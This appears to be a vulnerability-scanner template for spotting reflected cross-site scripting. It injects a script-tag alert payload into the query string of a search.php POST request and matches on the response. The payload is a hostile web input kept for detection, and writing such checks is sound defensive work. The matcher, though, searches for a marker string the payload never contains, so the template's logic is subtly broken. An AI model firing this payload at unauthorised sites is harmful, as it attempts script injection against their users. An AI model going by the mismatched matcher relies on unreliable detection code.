id: fuzz-reflection-xss

info:
  name: Basic Reflection Potential XSS Detection
  author: pdteam
  severity: low

requests:
  - payloads:
      fuzz:
        - "\">\"<script>alert('testshubham')</script>\""
  
    raw:
      - |
        POST /search.php?test={{fuzz}} HTTP/1.1
        Host: {{Host}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67
        Content-Length: 0
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate
        Connection: close

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{fuzz}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "6842'\"><9967"

      - type: word
        part: header
        words:
          - "text/html"